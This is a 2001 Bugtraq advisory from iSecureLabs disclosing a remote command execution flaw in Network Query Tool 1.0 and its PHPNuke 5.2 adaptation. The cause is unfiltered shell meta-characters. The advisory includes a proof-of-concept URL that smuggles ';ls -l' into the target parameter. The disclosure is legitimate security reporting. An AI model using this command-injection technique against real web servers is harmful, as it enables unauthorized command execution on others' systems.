Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

[Advisory iSecureLabs] Network Query Tool remote command execution

From: Cabezon Aurélien <aurelien.cabezon () isecurelabs com>
Date: Mon, 22 Oct 2001 02:15:43 +0200
--[ Network Query Tool 1.0 and Network Query Tool 1.0 Adapted for PHPNuke
5.2 remote command execution ]--

Problem discovered: 22/10/2001 by Cabezon Aurélien |
aurelien.cabezon () iSecureLabs com |
http://www.isecurelabs.com/article.php?sid=147

--[ Description ]--

Network Query Tool 1.0 Adapted for PHPNuke 5.2 is a PHP script thtat allow
user to:

- Resolve/Reverse Lookup
- Get DNS Records
- Whois (Web)
- Whois (IP owner)
- Check port
- Ping host
- Traceroute to host

Network Query tool does not check for special meta-characters like
&;`'\"|*?~<>^()[]{}$\n\r. This allow any user to execute
UNIX commands on web server.

--[ Exploit ]--

Execute ls -al command.
http://www.TEST.com/network_query.php?portNum=80&queryType=all&target=www.so
meserver.com%3Bls+-l&Submit=Do+It

--[ Fix ]--

Coders have been alerted

--[ Informations about Network Query Tool ]--

Network Query Tool 1.0 http://www.shat.net/php/nqt/
Network Query Tool 1.0 Adapted for PHPNuke 5.2 http://http://www.yacapa.com

---
Cabezon Aurélien
http://www.iSecureLabs.com
aurelien.cabezon () iSecureLabs com
Previous By Date Next
Previous By Thread Next

Current thread: